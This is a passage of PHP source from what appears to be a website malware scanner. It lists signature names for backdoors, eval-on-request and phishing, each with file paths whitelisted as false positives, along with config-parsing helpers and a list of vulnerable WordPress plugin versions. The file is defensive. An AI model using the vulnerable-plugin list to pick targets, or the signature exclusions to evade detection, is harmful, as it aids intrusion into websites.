'rex.Global_HEX.001' => array('/wp-content/plugins/wp-filebase-pro/', '/application/modules/Sitemobile/controllers/license/', '/application/modules/Sitegroupevent/controllers/license/', '/application/modules/Ynfbpp/Bootstrap.php', '/app/code/community/Nostress/Nscexport/', 'includes/src/Nostress_Nscexport_Model_Unit_Control.php', 'plugins/popup-domination/popup-domination.php', 'social-link-machine/v2/platforms/SLMOverBlogHelper.php', 'social-link-machine/utils/facebook/base_facebook.php', '/modules/Seaocore/controllers/license/license1.php', '/modules/Seaocore/controllers/license/request.php', '/modules/List/controllers/license/license2.php', '/modules/Socialengineaddon/controllers/license/license1.php', 'wp-content/plugins/social-link-machine/', 'plugins/popup-domination/popup-domination.admin.php', '/wp-content/themes/myrestaurant/core/theme.php', 'endy/includes/functions.php', '/app/code/community/AwoDev/AwoRewards/Model/License.php', '/app/code/community/Medma/Registrationremove/Model/Authenticate.php', '/mailer/includes/functions.php', '/app/code/local/medma/assigncategory/model/authenticate.php', '/yoast-wordpress-seo-premium/admin/license-manager/class-license-manager.php', '/includes/src/emvee_folio_block_adminhtml_abstract.php', '/app/code/community/medma/copyoptions/model/authenticate.php', '/sanalpospro/controllers/', '/sanalpospro/lib/', '/wp-content/plugins/social-funnel-machine/wpvp-', '/wp-content/plugins/social-funnel-machine/wp-', '/wp-content/plugins/social-funnel-machine/js/wpvp_', '/phpchat-free/', '/wp-content/plugins/dragonpay-for-woocommerce/index.php', '/wp-content/plugins/dragonpay-for-woocommerce/synchronization.php', '/wp-content/plugins/dragonpay-for-woocommerce/class2.php', '/wp-content/plugins/dragonpay-for-woocommerce/lib/', '/app/code/local/emvee/folio/block/', '/tigermin/controller/configcontroller.php', '/tigermin/controller/indexcontroller.php', '/mall/m/func_lib.php', '/mall/func_lib.php', ), 
'rex.array_filter.001' => array('/wp-content/plugins/mobile/lib/styleman/styleman.php', '/wp-content/plugins/page-builder-pmc/view/view-builder-page.php', ), 
'rex.array_join.001' => array('/app/code/community/Devinc/License/Helper/Devinc.php', '/includes/src/Devinc_License_Helper_Devinc.php', 'inc/ZipLib.class.php', 'mod_AutsonSlideShow/tmpl/default.php', 'NextBits/Nbcore/Helper/License.php', 'lib/exifreader/exifReader.php', '/wp-content/plugins/easy2map/includes/Easy2Map.php', 'wp-content/themes/striking/piecemaker/piecemakerXML.php', '/modules/mod_image_show_gk4/styles/', '/modules/mod_news_pro_gk5/helpers/gk.thumbs.php', '/mod_banners/mod_image_show_gk4/styles/', '/mod_banners/mod_news_pro_gk4/gk_classes/gk.thumbs.php', '/includes/src/NextBits_Nbcore_Helper_License.php', '/plugins/WPRobot3/wprobot.php', ), 
'rex.array_join.003' => array('Helper/Devinc.php', 'Devinc_License_Helper_Devinc.php', 'Helper/License.php', '/includes/src/NextBits_Nbcore_Helper_License.php', ), 
'rex.array_join.004' => array('store/app/code/community/Devinc/License/Helper/Devinc.php', 'inc/ZipLib.class.php', 'mod_AutsonSlideShow/tmpl/default.php', 'NextBits/Nbcore/Helper/License.php', 'lib/exifreader/exifReader.php', '/wp-content/plugins/easy2map/includes/Easy2Map.php', '/app/code/community/Devinc/License/Helper/Devinc.php', '/includes/src/Devinc_License_Helper_Devinc.php', 'wp-content/themes/striking/piecemaker/piecemakerXML.php', ), 
'rex.array_join.005' => array('store/app/code/community/Devinc/License/Helper/Devinc.php', 'lib/exifreader/exifReader.php', 'NextBits/Nbcore/Helper/License.php', 'mod_AutsonSlideShow/tmpl/default.php', '/wp-content/plugins/easy2map/includes/Easy2Map.php', '/app/code/community/Devinc/License/Helper/Devinc.php', '/includes/src/Devinc_License_Helper_Devinc.php', 'wp-content/themes/striking/piecemaker/piecemakerXML.php', ), 
'rex.array_join.007' => array('/uncode/functions.php', '/directoryadmin/manage_', '/wp-content/plugins/lastform/includes/class-lastform-helper.php', '/czat/install.php', '/partials/ifso_trigger_settings_metabox.php', ), 
'rex.backdoor.eval.002' => array('/plugins/buddypress/bp-activity/js/mentions', '/wp-content/themes/masterybootstrap-master/inc/fb-resources-app/angular/dist/vendor', ), 
'rex.backdoor.eval.005' => array('/wp-content/plugins/auto-tag/auto-tag.class.php', '/wp-content/plugins/ninjafirewall/lib/firewall.php', '/includes/labase.php', ), 
'rex.backdoor.generic.078' => array('/wp-content/themes/flexibility3/functions.php', ), 
'rex.backdoor_obfuscated.002.02' => array('/modules/magiczoomplus/magiczoomplus.php', '/captura/php/funciones.php', '/wp-content/plugins/dpproeventcalendar/functions.php', '/plugins/system/magicscroll/magicscroll.php', '/magiczoom/magiczoom.php', '/wp-content/plugins/booking/lib/wpdev-booking-class.php', '/wp-content/plugins/qards/vendor/designmodo/qards/utility/settingspage.php', ), 
'rex.binary_content.001' => array('wp-content/wflogs/attack-data.php', ), 
'rex.chr_concatenation.001' => array('/admin.cgi', '/admin_', '/currency_update.cgi', '/gallery.cgi', '/guestbook.cgi', '/links.cgi', '/lost_password.cgi', '/myreservation.cgi', '/unit_types.cgi', '/webpages.cgi', 'WP/AdvancedSlider/', '/app/code/community/litextension', '/app/code/community/wp/amazonimportproducts/', '/app/code/local/wp/onepagecheckout/', '/includes/src/wp_advancedslider_', ), 
'rex.create_function.003' => array('/paypal/vendor/paypal/rest-api-sdk-php/lib/paypal/transport/paypalres.php', ), 
'rex.defaced.generic.007' => array('/wordfence/lib/menu_scan.php', '/wordfence/lib/menu_scan_scan.php', '/wp-content/plugins/sucuri-scanner/inc/', '/wp-content/plugins/wordpress-sentinel/wordpress_sentinel.php', '/plugins/security-ninja/security-ninja.php', '/wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/igit-rpwt.php', '/administrator/language/en-gb/en-gb.plg_system_jhackerwatch.ini', '/plugins/exploit-scanner/exploit-scanner.php', '/wp-content/plugins/bot-tracker/', '/docs-adodb.htm', '/administrator/components/com_akeeba/script.akeeba.php', '/administrator/components/com_falang/script.php', '/sucuri-hacked-cleanup.php', '/plugins/quttera-web-malware-scanner/', '/under-construction-page/under-construction.php', '/lang/', '/wp-content/plugins/woorewards/assets/lws-adminpanel/credits/query.php', '/wp-content/plugins/prevent-direct-access-gold/includes/class-prevent-direct-access-gold-constants.php', '/wp-content/plugins/ninjascanner/lib/tab_about.php', '/wp-content/plugins/antihacker/dashboard/dashboard.php', '/wp-content/plugins/antihacker/includes/functions/functions.php', '/core/domsecure.php', ), 
'rex.defaced.generic.008' => array('/pressforward/libraries/mozillareadability/test/', ), 
'rex.defaced.generic.009' => array('/webalizer/usage_', '/php-nuke/modules/forums/language/lang-', '/faq.php', 'thestory/latchets.htm', '/wp-content/plugins/bulletproof-security/admin/login/lsm-help-text.php', ), 
'rex.defaced.generic.010' => array('/lookforbadguys.php', '/jamss.php', '/aam_secure/view/security.phtml', '/uncode/library/js/plugins.js', '/distutils/msvccompiler.py', '/wp-content/plugins/wordfence/readme.txt', '/prepress-services/file-upload.php', '/library/js/plugins.js', ), 
'rex.eval_cookie.003' => array('wp-content/plugins/wm4d-options/includes/flipper/flipper.php', ), 
'rex.eval_post.002' => array('/wp-content/plugins/formidable/pro/classes/controllers/FrmProXMLController.php', '/wp-content/plugins/astickypostorderer/croer-transact.php', '/wp-content/plugins/convertplug/admin/import-ajax.php', '/wp-content/themes/Avada-Child-Theme/functions.php', ), 
'rex.eval_post.006' => array('/plugins/masterslider/admin/views/slider-panel/js/msp.required.js', 'wp-content/plugins/master-slider/admin/views/slider-panel/js/msp.required.js', '/js/tablefilter/picnet.table.filter.min.js', ), 
'rex.eval_var.002' => array('/atrex/', ), 
'rex.exploit_title.001' => array('/pressforward/libraries/mozillareadability/test/', ), 
'rex.fgc_url.001' => array('plugins/cyclone-slider-2/src/CycloneSlider/Vimeo.php', 'modules/uspscarrier/uspscarrier.php', 'wp-content/plugins/duracelltomi-google-tag-manager/public/frontend.php', 'newsletter/includes/module.php', 'wp-content/plugins/liveoptim/admin/actions/inscription.class.php', 'wp-content/plugins/liveoptim/admin/actions/inscription_url.class.php', 'apc.php', '/modules/ebay/ebay.php', '/application/modules/Core/views/scripts/admin-system/apc.tpl', '/application/modules/Sitemobile/modules/Video/controllers/IndexController.php', '/application/modules/Sitepagevideo/controllers/IndexController.php', '/application/modules/Sitereview/controllers/VideoController.php', '/application/modules/Video/controllers/IndexController.php', 'wp-content/plugins/cyclone-slider-2/classes/class-cyclone-slider-vimeo.php', '/wp-content/plugins/sucuri-scanner/sucuri.php', 'sucuri-scanner/lib/core_integrity.php', 'wp-content/themes/RightNow/includes/main-ajax.php', '/wp-content/plugins/lightbox-gallery/lightbox-gallery.php', '/dynamo-support/includes/dynamoupdates.class.php', 'mod_freshslideshow/tmpl/imgfolder.php', 'mod_freshslideshow/tmpl/corecontent.php', 'wp-content/themes/exclusy/functions.php', 'themes/vigor/templates/portfolio/portfolio-big-images.php', 'themes/vigor/templates/portfolio/portfolio-gallery.php', 'wp-content/plugins/click-heat-dynamo/tpl/dynamoupdates.class.php', 'wp-content/themes/legalized/functions.php', 'wp-content/plugins/split-test-dynamo/tpl/dynamoupdates.class.php', '/modules/List/controllers/VideoController', '/application/modules/Video/controllers/IndexController', 'wp-content/themes/edwards-theme/functions.php', '/wp-content/plugins/check-and-enable-gzip-compression/class.richards-toolbox.php', '/functions-pre-book-v3.php', 'phpBB3/cb/cb_install/functions.php', 'phpBB3/store/mods/tapatalk-phpbb3/root/mobiquo/web.php', 'cb/cb_install/functions.php', 'modules/mod_we_ufeed_display/classes/helper.php', '/wp-content/themes/charity/functions/functions.php', 'wp-content/plugins/instapress/instagram.php', 'wp-content/plugins/amazon-dynamo/includes/updates/dynamoupdates.class.php', '/wp-content/themes/qadialogue/Weather_Widget/weather.class', '/modules/htmlbox/htmlbox.php', '/components/com_uniform/models/form.php', ), 
'rex.fgc_url.002' => array('/jumpmobi_inspire_theme/jmi-directions-touch.php', 'themes/directory-theme/functions.php', 'wp-content/themes/florida-wp/investors.php', 'wp-content/plugins/real_estate_pro/template/property/single-property.php', 'wp-content/plugins/real_estate_pro/template/property/ajax-single-property.php', 'wp-content/plugins/real_estate_pro/template/private-profile/profile-all-post-1.php', 'wp-content/plugins/real_estate_pro/plugin.php', '/mod_banners/mod_stock_gk4/helper.php', '/components/com_hwdmediashare/libraries/renderer/rssgeo.php', '/plugins/kfm/', '/wp-content/plugins/woocommerce-upload-my-file/woocommerce-upload-my-file.php', '/imic-framework/imic-theme-functions.php', ), 
'rex.fgc_url.003' => array('/pages/contenidopago_report.php', ), 
'rex.function_through_request.001' => array('/install.php', 'wp-content/plugins/microdata-for-seo-by-optimum7com/index.php', '/wp-content/plugins/ds-live-composer/includes/ajax.php', ), 
'rex.hex_obfuscated.003' => array('/instagram-php/src/debug.php', ), 
'rex.hidden_colored_spam.001' => array('/htmlarea/reference.html', ), 
'rex.htaccess-add-handler.001' => array('bulletproof-security/includes/functions.php', '/lookforbadguys.php', '/components/com_ose_firewall/protected/data/vsscanpath/pattern.php', ), 
'rex.include_abs_path.001' => array('gd-system-plugin/class-gd-system-plugin-admin-menu.php', 'core/adodb/docs-adodb.htm', 'core/adodb/docs-datadict.htm', 'wp-content/advanced-cache.php', 'moodle/question/engine/lib.php', 'modules/dashboard/actions/getInlineGraphValues.php', 'moodle/question/engine/bank.php', 'wp-content/plugins/lightbox/lightbox.php', 'wp-content/plugins/wordpress-social-login/hybridauth/index.php', 'wp-content/themes/baristanet-restaurants-broken/home.php', 'm-wp-popup/includes/classes/wpp_email_manager.php', 'wp-content/plugins/sola-newsletters/sola-newsletters.php', '/wp-content/plugins/a2-optimized-wp/A2_Optimized_Plugin.php', ), 
'rex.include_image.001' => array('/velocity/index.html', 'components/com_easycaptcha/captchas/Secimg-Captcha/inc/', ), 
'rex.include_malware.001' => array('wp-content/plugins/internal-links-generator/settings.php', '/wp-content/themes/ElegantBiz/functions.php', '/wp-content/themes/ElegantBiz/functions/feature-functions.php', '/wp-content/themes/ElegantBiz/functions/shortcodes.php', '/wp-content/plugins/ultimate-premium-plugin/views/sfsi_option_view8.php', '/newElegantBiz/functions.php', ), 
'rex.include_requests.001' => array('themeple_framework/system/ajax_functions.php', 'framework/php/function-set-avia-ajax.php', ), 
'rex.include_susp_extension.001' => array('wp-content/plugins/collapsing-categories/collapscatwidget.php', 'piwik/vendor/mustangostang/spyc/php4/test.php4', 'plugins/wp-super-cache/wp-cache-phase2.php', 'components/com_aclsfgpl/admconf.php', 'plugins/shopp/core/flow/Warehouse.php', '/codepress/languages/php.js', 'includes/functions_module.php', 'includes/functions_convert.php', 'phpbb/search/base.php', 'wp-cache/wp-cache-phase2.php', 'plugins/leaflet-maps-marker-pro/leaflet-core.php', 'plugins/popup-domination/popup-domination.admin.php', 'umil/umil.php', 'includes/functions_posting.php', 'includes/umil.php', 'support/recache_moderators.php', 'phpBB3/includes/acp/acp_mods.php', '/sohoadmin/client_files/', '/sohoadmin/plugins/', '/sohoadmin/program/', '/sohoadmin/version.php', '/com_joomlaxplorer/scripts/codepress/languages/asp.js', '/com_joomlaxplorer/scripts/codepress/languages/vbscript.js', '/natemail/NateMail.php', 'endy/includes/functions.php', '/sendy/install.php', '/backupdb.php', '/wp-content/plugins/quiz-master-next/php/class-qmn-quiz-manager.php', '/mailer/includes/functions.php', '/assets/snippets/wayfinder/snippet.wayfinder.php', 'components/com_easycaptcha/captchas/secimg-captcha/inc/', ), 
'rex.js_injector.003' => array('/themes/karma/functions/admin/theme-functions.php', ), 
'rex.link_newlines.001' => array('wp-content/cache/page/', ), 
'rex.link_sequence.001' => array('/codemirror/index.html', '/wp-content/cache', '/html_topdf/pdfencryptor.html', ), 
'rex.long_nonstandard.001' => array('wp-content/plugins/white-label-branding/includes/bundles', 'wp-content/plugins/user-meta/models/enc/umProSupportModelEncrypted.php', 'open-floor-plan/plugins/LayerSlider_Export.json', 'framework/addons/wordpress-importer/files/LayerSlider_Export.json', '/wp-content/plugins/white-label-branding/bundles/', '/includes/src/scommerce_core_helper_data.php', ), 
'rex.malware.generic.006' => array('/app/code/local/Mirasvit/MCore/Helper/Code.php', '/includes/src/mirasvit_mcore_helper_code.php', '/wp-content/plugins/premium-floating-social-media-icon/', '/lmseo.php', 'wp-content/plugins/wpgroupbuy-plugin/includes/classes/wpg.license.class.php', ), 
'rex.malware.generic.036' => array('/wpscripts/jssecurity.js', ), 
'rex.malware.obfuscated.004' => array('wp-content/plugins/simple-subscribe/libs/Nette/Nette.min.php', 'components/com_plotalot/models/chart.php', 'framework/vendor/nette-closures.min.inc', 'framework/vendor/nette.min.inc', ), 
'rex.malware.small_file.001' => array('/usergroup.php', 'template/rewardssocial/facebook/share/button.phtml', '/app/code/local/HM/DeveloperToolbar/Block/Core_notuse_because_cant_override_block_Template/Template.php', '/HM_DeveloperToolbar_Block_Core_notuse_because_cant_override_block_Template_Template.php', '/s2framework/libs/utf8_to_ascii/db/', 'inc/template_footer/socials.php', 'body_end/event_register', 'types/includes/fields/skype.php', '/includes/src/Indies_SEOSuite_Helper_data_x27.php', ), 
'rex.malware.small_file.003' => array('/app/code/local/Sm/Shopby/Helper/data/x10.php', '/s2framework/libs/utf8_to_ascii/db/', 'includes/src/Indies_SEOSuite_Helper_data_x27.php', ), 
'rex.malware_generic.018' => array('components/com_chronocontact/chronocontact.html.php', '/components/com_vm_soa/models/settings.php/components/com_chronocontact/plugins/cf_Authorize_dotnet.php', 'modules/shipping/AllInOneShipping/log.inc.php', 'modules/shipping/AllInOneShipping/index.inc.php', 'modules/shipping/AllInOneShipping/calc.php', 'modules/shipping/AllInOneShipping/zones.inc.php', 'administrator/components/com_vm_soa/models/settings.php', '/wp-content/plugins/BloggingToolbox/', '/wp-content/themes/ThemeToolbox/tools/', 'admin/sources/products/import.inc.php', '/modules/3rdparty/Custom_Product_Sort/admin/admin1.inc.php', 'modules/3rdparty/Custom_Product_Sort/admin/index.inc.php', 'modules/3rdparty/Custom_Product_Sort/viewprod1.inc.php', 'modules/3rdparty/Customer_Groups_Discount/admin/index.inc.php', 'modules/3rdparty/Customer_Groups_Discount/classes/customer_groups.inc.php', '/modules/3rdparty/Customer_Groups_Product_Prices/admin/index.inc.php', 'modules/3rdparty/Customer_Groups_Product_Prices/classes/customer_groups_prices.inc.php', '/components/com_vm_soa/models/settings.php', '/update/wfc_updater.php', ), 
'rex.mlw_comment_tag.001' => array('plugins/envato-wordpress-toolkit/', '/wp-content/themes/constructor/css.php', '/wp-content/themes/constructor/style.css', 'wp-content/themes/constructor/css-editor.php', ), 
'rex.mlw_comment_tag.002' => array('/modules/member/mod.member.php', ), 
'rex.multi_vars.003' => array('wp-content/plugins/WPRobot3/wprobot.php', ), 
'rex.multi_vars.004' => array('wp-content/plugins/alphaomega-captcha-anti-spam/addenda/asis.php', 'modules/mod_playerjr/mod_playerjr.php', 'porpress/porpress.php', 'wp-content/plugins/flagallery-skins/', 'default/styles/overlays', '/administrator/components/com_rsseo/views/competitors/tmpl/default.php', 'MailingList/texts', '/plugins/frontend_builder/functions/shortcodes.php', 'plugins/flickr-photostream/flickr-photostream.php', 'modules/mod_playerjr_ad/mod_playerjr_ad.php', '/vsadmin/inc/language', '/php/automoduly.php', '/wp-content/plugins/profit_builder/functions/shortcodes.php', 'wp-content/plugins/flickr-justified-gallery/flickr-justified-gallery.php', 'wp-content/themes/grill/inc/templates/croma_frontpage.php', 'wp-content/themes/fsb-fluid-wp/admin/skin-color-defaults.php', 'db/tiki-db.phpdb/tiki-db.php', 'wp-content/plugins/simple-feed-stats/tracker.php', 'wp-content/plugins/simple-feed-stats/simple-feed-stats.php', 'wp-content/plugins/genesis-toolbar-extras/includes/gtbe-', 'gallery/lang/', 'mysql/lang/', '/data/tcms_global/database.php', '/modules/vtmarketing/VTfeed_prestashop.php', '/components/com_muscol/libraries/getid3/demos/demo.browse.php', '/wp-content/plugins/wp-client/includes/libs/smarty/plugins/function.html_select_time.php', '/administrator/components/com_sh404sef/config/config.sef.php', '/inc/vieworders.php', '/inc/viewvcorders.php', '/smarty/plugins/function.html_select_time.php', '/checkout_eleganza.php', ), 
'rex.obfu_string.001' => array('wordpress-ping-optimizer/cbnet-ping-optimizer.php', 'plugins/pricingtable/pricingtable-settings.php', 'wp-content/plugins/jigoshop/classes/jigoshop_options.class.php', 'wp-content/plugins/accordions/accordions-help.php', '/wp-content/plugins/post-grid/includes/menu/post-grid-settings.php', '/wp-content/plugins/cbnet-favicon/cbnet-favicon.php', 'plugins/accordions/includes/menu/help.php', 'userpro/functions/badge-functions.php', 'userpro/functions/fields-hooks.php', 'plugins/social-share-button/ssb-settings.php', 'wp-content/plugins/timeline-ultimate/includes/timeline-um-meta.php', 'wp-content/plugins/CCGallery/CCGallery.php', '/wp-content/plugins/jigoshop/trunk/classes/jigoshop_options.class.php', '/wp-content/plugins/tabs/includes/menu/help.php', '/wp-content/plugins/social-warfare/functions/header-meta-tags.php', '/plugins/team/includes/menu/help.php', '/slider_filemanager/ajax_calls.php', '/wp-content/plugins/file-away/lib/inc/inc.admin.about.php', ), 
'rex.phish_mailer_gen.001' => array('/wp-content/plugins/the-events-calendar-extension-registration/public/class-event-registration-public.php', ), 
'rex.phishing.saved_from_url.001' => array('/apimobi.html', '/wp-content/plugins/facebook-messenger/documentation/data/', ), 
'rex.require_abs_path.001' => array('modules/dashboard/actions/getInlineGraphValues.php', '/app/design/frontend/default/ram/template/page/html/head.phtml', '/modules/upgradewizard/silentupgrade_dce_', ), 
'rex.require_js.001' => array('/assets/dropzone/dropzone.js', '/wordpress-seo-premium/js/dist/wp-seo-term-scraper-460.js', '/wordpress-seo-premium/js/dist/wp-seo-post-scraper-460.js', '/wordpress-seo-premium/js/dist/wp-seo-recalculate-460.js', '/babel-core/index.js', ), 
'rex.spaced_POST.002' => array('/ose-firewall/protected/library/fwscanner/fwscannerbs.php', 'controllers/admin/AdminCustomersController.php', ), 
'rex.spaced_code.001' => array('/wp-content/plugins/wordfence/lib/wfcrawl.php', ), 
'rex.spaced_code.002' => array('/components/com_dtregister/lib/payment/omngateway.php', '/wp-content/plugins/zoho-campaigns/php/signup-formpage.php', '/app/design/frontend/base/default/template/giftwrap/giftbox/paper.phtml', '/ebay/motor/add.phtml', ), 
'rex.string_rearrangement.001' => array('Devinc/License', 'mod_AutsonSlideShow/tmpl/default.php', 'NextBits/Nbcore/Helper/License.php', '/includes/src/Devinc_License_Helper_Devinc.php', '/includes/src/NextBits_Nbcore_Helper_License.php', '/plugins/WPRobot3/wprobot.php', '/youtube-quick-shortcode/ytube.php', 'plimunnivoslider/tmpl/default.php', ), 
'rex.suspicious-formatting.001' => array('/application/modules/Advancedactivity/widgets/advancedactivitylinkedin-userfeed/index.tpl', ), 
'rex.undefined_const_concatenation.001' => array('wp-content/plugins/kingcomposer/includes/kc.optimized.php', ), 
'rex.url_short.001' => array('/wp-content/plugins/e-signature/views/about/about.php', ), 
'rex.url_short.002' => array('/themes/Karma/functions/admin/theme-functions.php', ), 
'rex.var_obfuscated.001' => array('/natemail/NateMail.php', '/wp-content/plugins/prisna-wp-translate/classes/classes.php', 'wp-content/plugins/popup-builder/files/sg_functions.php', ), 
'rex.xor_data.001' => array('/lib/wiki_to_markdown.php', ), 
'rex.xor_warnings.001' => array('classes/language.class.php', '/wp-content/plugins/users-ultra/xooclasses/xoo.userultra', '/wordfence/wf-waf/src/lib/storage/file.php', '/plugins/booking-ultra-pro/classes/bookingultra.class.php', '/system/library/googleshopping/googleshopping.php', ), 
'rex.xor_warnings.002' => array('plugins/stop-spammer-registrations-plugin/classes/be_module.class.php', 'classes/language.class.php', ), 
);


// Get file content and find the line with content
function findLineInFile($file, $content)
{
    $fh = @fopen($file, "r");
    if (!$fh) {
        echo "DEBUG: UNABLE TO CHECK " . escapeHtml($file) . "\n";
        return null;
    }
    while (($buffer = fgets($fh, 4096)) !== false) {
        if (strpos($buffer, $content) !== false) {
            fclose($fh);
            return $buffer;
        }
    }
    fclose($fh);
    return null;
}

if (!function_exists('file_get_contents')) { // below PHP 4.3
    function file_get_contents($fileName) {
        $fh = @fopen($fileName);
        if ($fh === false) {
            return false;
        }
        $res = fread($fh, 1048576);
        fclose($fh);
        return $res;
    }
}

define('OPT_TYPE_CONST',      1);
define('OPT_TYPE_VAR',        2);
define('OPT_TYPE_ASSOC',      4);
define('OPT_TYPE_ENV',        8);
define('OPT_TYPE_XML',       16);
define('OPT_TYPE_FIRST',     32);
define('OPT_TYPE_CONST_NUM', 64);

function getOptMatch($m, $type)
{
    return ($type & OPT_TYPE_FIRST) ? $m[0] : $m[count($m) - 1];
}

function getOption($option, $config, $type)
{
    $option = preg_quote($option);

    // String constants (WordPress)
    if (($type & OPT_TYPE_CONST) &&
        preg_match_all('@^\s*define\(\s*([\'"])' . $option . '\1\s*,\s*([\'"])(.*)\2\s*\)\s*;@m', $config, $m)) {
            return stripslashes(getOptMatch($m[3], $type));
    }

    // Numeric constants
    if (($type & OPT_TYPE_CONST_NUM) &&
        preg_match_all('@^\s*define\(\s*([\'"])' . $option . '\1\s*,\s*(\d*)\s*\)\s*;@m', $config, $m)) {
            return stripslashes(getOptMatch($m[2], $type));
    }

    // wp-config.php trick, see
    // http://www.wpbeginner.com/wp-tutorials/useful-wordpress-configuration-tricks-that-you-may-not-know/
    if (($type & OPT_TYPE_ENV) && preg_match('@^\s*define\(\s*([\'"])' . $option . '\1\s*,\s*\$_ENV\s*[[{]\s*' .
        '([\'"]?)DATABASE_SERVER\2\s*[}\]]\s*\)\s*;@m', $config, $m)) {
            return $_ENV['DATABASE_SERVER'];
    }

    // Variables (Joomla, WordPress prefix)
    if (($type & OPT_TYPE_VAR) &&
        preg_match_all('@^\s*(?:public|var)?\s*' . $option . '\s*=\s*(?:([\'"])(.*)\1|([0-9]+))\s*;@m', $config, $m)) {
            $str = getOptMatch($m[2], $type); // Return the string m[2] or the number m[3] if the string was not found
            return $str ? stripslashes($str) : getOptMatch($m[3], $type);
    }

    // Associative arrays (Drupal)
    if (($type & OPT_TYPE_ASSOC) &&
        preg_match_all('@(?:^|,|\()\s*([\'"])' . $option . '\1\s*=>\s*([\'"])(.*?)\2\s*[,)]@m', $config, $m)) {
            return stripslashes(getOptMatch($m[3], $type));
    }

    // Magento XML config
    if (($type & OPT_TYPE_XML) && preg_match_all('@^\s*<' . $option . '>(?:<!\[CDATA\[|\{\{)(.*)(?:}}|\]\]>)</' .
        $option . '>\s*$@m', $config, $m)) {
            return getOptMatch($m[1], $type);
    }

    return '';
}


// Properly escape HTML content
function escapeHTML($string)
{
    global $isPlainText;

    if ($isPlainText) {
        return $string;
    }

    if (!defined('ENT_SUBSTITUTE')) {
        define('ENT_SUBSTITUTE', 0);
    }

    return htmlspecialchars($string, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}


$VULNERABLE_PLUGINS = array(
    'fancybox.php' => array('3.0.2', 'https://blog.sucuri.net/2015/02/zero-day-in-the-fancybox-for-wordpress-plugin.html', 'Fancybox'),
    'gravityforms.php' => array('1.8.20', 'https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html', 'Gravity Forms'),
    'hdflvvideoshare.php' => array('2.8', '', 'HDFLV Videoshare'),
    'grpdocsassembly.php' => array('2.0.5', '', 'Group Docs Assembly'),
    'wp-seo.php' => array('3.4.2', '', 'Yoast SEO'),
    'blogvault.php' => array('1.45', 'https://blogvault.net/security-notification/', 'BlogVault'),
    'ultimate-member.php' => array('2.0.23', '', 'BlogVault'),
    'duplicator.php' => array('1.2.29', '', 'SnapCreek'),
    'wp-gdpr-compliance.php' => array('1.4.3', '', 'WP GDPR Compliance'),
    'propeller-ads.php' => array('1.0.0', 'This plugin is known for having hardcoded links to ad-rotators involved in fraud.', 'PropellerAds'),
    'easy-wp-smtp.php' => array('1.3.9', 'https://blog.sucuri.net/2019/03/0day-vulnerability-in-easy-wp-smtp-affects-thousands-of-sites.html', 'Easy WP SMTP'),
    'social-warfare.php' => array('3.5.3', 'https://blog.sucuri.net/2019/03/zero-day-stored-xss-in-social-warfare.html', 'Social Warfare'),
    'migla-donation.php' => array('2.0.6', 'The plugin Total Donations has a 0day vulnerability, needs to be removed completely to prevent further attacks, not just disabled.', 'Total Donations'),
    'yuzo_related_post.php' => array('5.12.95', 'https://blog.sucuri.net/2019/04/attacks-on-closed-wordpress-plugins.html', 'Yuzo Related Post'),
    'advanced-cf7-db.php' => array('1.6.1', 'https://blog.sucuri.net/2019/04/sql-injection-in-advance-contact-form-7-db.html', 'Advanced Contact Form 7 DB'),
    'yellow-pencil.php' => array('7.2.0', 'https://wpvulndb.com/vulnerabilities/9256', 'Yellow Pencil'),
    'woocommerce-checkout-manager.php' => array('4.3', 'https://blog.sucuri.net/2019/04/insufficient-privilege-validation-in-woocommerce-checkout-manager.html', 'WooCommerce Checkout Manager'),
    'blog-designer.php' => array('1.8.13', '', 'Blog Designer'),
    'wp-live-chat-support.php' => array('8.0.28', 'https://blog.sucuri.net/2019/05/persistent-cross-site-scripting-in-wp-live-chat-support-plugin.html', 'WP Live Chat Support'),
    'fb-messenger-live-chat.php' => array('1.4.8', '', 'Live Chat with Facebook Messenger'),
    'wp-slimstat.php' => array('4.8.1', 'https://blog.sucuri.net/2019/05/slimstat-stored-xss-from-visitors.html', 'Slimstat Analytics'),
    'wp-live-chat-support-pro.php' => array('8.0.12', '', 'WP Live Chat Support Pro'),
    'wp-database-backup.php' => array('5.3', '', 'WP Database Backup'),
    'wp_mail_smtp.php' => array('1.5.1', '', 'WP Mail SMTP by WPForms'),
    'wp-contact-form-7.php' => array('5.0.4', 'https://contactform7.com/2018/09/04/contact-form-7-504/', 'Contact Form 7'),
    'cpabc_appointments.php' => array('1.3.19', '', 'Appointment Booking Calendar'),
    'simple-301-bulk-uploader.php' => array('1.2.5', '', 'Simple 301 Redirects – Addon – Bulk Uploader'),
    'nd-shortcodes.php' => array('6.0', '', 'ND Shortcodes For Visual Composer'),
    'wp-private-content-plus.php' => array('1.32', '', 'WP Private Content Plus'),
    'woocommerce-filters.php' => array('1.3.7', 'https://labs.sucuri.net/unauthenticated-settings-update-in-woocommerce-ajax-filters/', 'Advanced AJAX Product Filters'),
    'file_folder_manager.php' => array('5.4', 'https://labs.sucuri.net/plugins-under-attack-june-2019/', 'File Manager'),
    'mystickymenu.php' => array('2.1.6', 'https://labs.sucuri.net/plugins-under-attack-june-2019/', 'Sticky Menu Plugin'),
    'wp-support-plus.php' => array('9.1.2', 'https://labs.sucuri.net/plugins-under-attack-june-2019/', 'WP Support Plus Responsive Ticket System'),
    'folders.php' => array('2.1.1', 'https://labs.sucuri.net/plugins-under-attack-june-2019/', 'Folders Plugins'),
    'supportcandy.php' => array('2.0.6', 'https://labs.sucuri.net/plugins-under-attack-june-2019/', 'SupportCandy'),
    'rich-reviews.php' => array('1.7.4', 'https://wordpress.org/plugins/rich-reviews/', 'Rich Reviews'),
    'wp-piwik.php' => array('1.0.19', 'https://labs.sucuri.net/plugins-under-attack-june-2019/', 'WP-Matomo (WP-Piwik)'),
    'wp-quick-booking-manager.php' => array('1.2', 'https://wordpress.org/plugins/wp-quick-booking-manager/', 'WP Quick Booking Manager (Closed - Plugin should be manually Removed)'),
    'simple_fields.php' => array('1.4.12', 'https://wordpress.org/support/topic/hack-related-to-simple-fields/', 'Simple Fields'),
    'popup-maker.php' => array('1.8.13', 'https://wpvulndb.com/vulnerabilities/9907', 'Popup Maker'),
    'premium-addons-for-elementor.php' => array('3.7.3', 'https://www.pluginvulnerabilities.com/2019/09/10/hackers-may-already-be-targeting-this-authenticated-persistent-xss-vulnerability-in-premium-addons-for-elementor/', 'Premium Addons for Elementor'),
    'simple-staff-list.php' => array('2.2.1', 'https://labs.sucuri.net/plugins-added-to-malware-campaign-july-2019/', 'Simple Staff List'),
